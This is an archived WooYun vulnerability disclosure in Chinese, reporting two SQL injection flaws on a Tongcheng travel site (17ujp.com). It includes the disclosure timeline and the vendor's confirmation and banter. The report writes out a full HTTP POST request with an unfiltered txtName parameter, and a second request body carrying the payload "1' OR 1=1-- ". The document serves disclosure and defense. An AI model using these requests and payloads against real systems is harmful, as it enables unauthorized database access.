当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089508

漏洞标题:同程旅游SQL注入二枚打包

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: 0x70

提交时间:2014-12-31 16:20

修复时间:2015-02-14 16:22

公开时间:2015-02-14 16:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-31: 细节已通知厂商并且等待厂商处理中
2014-12-31: 厂商已经确认,细节仅向厂商公开
2015-01-10: 细节向核心白帽子及相关领域专家公开
2015-01-20: 细节向普通白帽子公开
2015-01-30: 细节向实习白帽子公开
2015-02-14: 细节向公众公开

简要描述:

放假之前提交个同城,上次的礼物已收到。
发这个漏洞我只想说 这个不是小号。
元旦快乐。

详细说明:

2个我就一起提交了,给20rank吧 亲。
第一处(需注册账号登陆):
POST /wb_flightexchangelist.aspx HTTP/1.1
Host: www.17ujp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=gye3pozbcdnwlvnh12djcuhk
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1137
btnSearch=%e6%90%9c%e7%b4%a2&ddlStatus=1&ddlType=1&hidId=&left%24hidIsHotel=&txtName=a&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEQKQ6J3LCALN6YSqCAKwjbCsAgLJhLWvBAKMz%2bb%2bAQLs9aT%2bBALByPG9AgLEhISFCwK0gMnQAQK77%2bO%2bDQK67%2bO%2bDQLyn9n2CgLi8POYBgL98POYBgL88POYBgL/8POYBgKln/PuCq0WFyqKd852sPxlUZyBwpnCHQJ9e4dxnGaa0ROzBiz1&__VIEWSTATE=/wEPDwULLTE1OTIyNTMwOTcPZBYCAgMPZBYKAgUPZBYGZg8WAh4EaHJlZmQWAmYPFgIeA3NyYwU5aHR0cDovL2pwLjE3dWpwLmNvbS9BZG1pbi91cGxvYWRmaWxlL0FESW1hZy84MTI3OS9sb2cuZ2lmZAIBDxYCHgVzdHlsZQUOZGlzcGxheTpibG9jazsWBAIBDw8WAh4EVGV4dAUHZGFya2V4cGRkAgUPDxYCHwMFLiZuYnNwO%2baCqOW9k%2bWJjeWPr%2beUqOenr%2bWIhu%2b8mjAmbmJzcDvliIYmbmJzcDtkZAICDxYCHwIFDWRpc3BsYXk6bm9uZTtkAgcPZBYEAgMPFgIfAgUOZGlzcGxheTpibG9jaztkAgUPFgIfAgUNZGlzcGxheTpub25lO2QCCw8QDxYGHg1EYXRhVGV4dEZpZWxkBQROYW1lHg5EYXRhVmFsdWVGaWVsZAUCSWQeC18hRGF0YUJvdW5kZ2QQFQMG5YWo6YOoDOWco%2bivnuekvOeJqQzmiYvmnLrmlbDnoIEVAwABMQEyFCsDA2dnZ2RkAhMPFgIeCWlubmVyaHRtbAUq57O757uf5rKh5pyJ5pCc57Si5Yiw55u45Yy56YWN55qE6K6w5b2V77yBZAIXD2QWBAIBDw8WAh8DBRA4Ni0wNTMyLTg5ODcwMzE1ZGQCAw8PFgIfAwUJ5ZCM56iL572RZGRkLfm7IXAwg%2bJYkaWkzx3N7TU8GwctKCqgBV%2b1oBB9QFU%3d
txtName未过滤
第二处(需要登陆):http://www.17ujp.com/wb_flightexchangehistory.aspx
btnSearch=%e6%90%9c%e7%b4%a2&left%24hidIsHotel=&txtPointEndTime=1&txtPointStartTime=1'%20OR 1=1--%20&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALK2ZjiBwLJhLWvBAKMz%2bb%2bAQLs9aT%2bBALByPG9AgKSz5TxBQLzq4v9DwKln/PuCvR3W5s6tnGP/%2bltBYX1faFQUbSMDq/1lQt/5CpLMqEk&__VIEWSTATE=/wEPDwULLTE5OTU0NTkwNDIPZBYCAgMPZBYIAgEPZBYGZg8WAh4EaHJlZmQWAmYPFgIeA3NyYwU5aHR0cDovL2pwLjE3dWpwLmNvbS9BZG1pbi91cGxvYWRmaWxlL0FESW1hZy84MTI3OS9sb2cuZ2lmZAIBDxYCHgVzdHlsZQUOZGlzcGxheTpibG9jazsWBAIBDw8WAh4EVGV4dAUHZGFya2V4cGRkAgUPDxYCHwMFLiZuYnNwO%2baCqOW9k%2bWJjeWPr%2beUqOenr%2bWIhu%2b8mjAmbmJzcDvliIYmbmJzcDtkZAICDxYCHwIFDWRpc3BsYXk6bm9uZTtkAgMPZBYEAgMPFgIfAgUOZGlzcGxheTpibG9jaztkAgUPFgIfAgUNZGlzcGxheTpub25lO2QCDQ8WAh4JaW5uZXJodG1sBSrns7vnu5/msqHmnInmkJzntKLliLDnm7jljLnphY3nmoTorrDlvZXvvIFkAhEPZBYEAgEPDxYCHwMFEDg2LTA1MzItODk4NzAzMTVkZAIDDw8WAh8DBQnlkIznqIvnvZFkZGQ6KGH48xsFm83nWgrmyW91KGLK5ralyn6mVtP0K7/6kw%3d%3d

tc.png


tc2.png

tc3.png

漏洞证明:

tc.png


tc2.png

tc3.png

修复方案:

你们懂的

版权声明:转载请注明来源 0x70@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-12-31 17:12

厂商回复:

感谢对同程旅游的关注,这个还真给不了20,这个站基本是无人维护的状态。
正巧拿过来测试软WAF吧,元旦快乐。
下午发了500京东卡给sex is not show了,我以为是你大号的,要不你俩好基友分一下?

最新状态:

暂无


漏洞评价:

评论

  1. 2014-12-31 17:15 | 苏州同程旅游网络科技有限公司(乌云厂商)

    哦,说错了,应该是你和sex is not show分一下。

  2. 2015-01-01 09:56 | 0x70 ( 普通白帽子 | Rank:228 漏洞数:33 | 正在输入中....)

    @苏州同程旅游网络科技有限公司 ok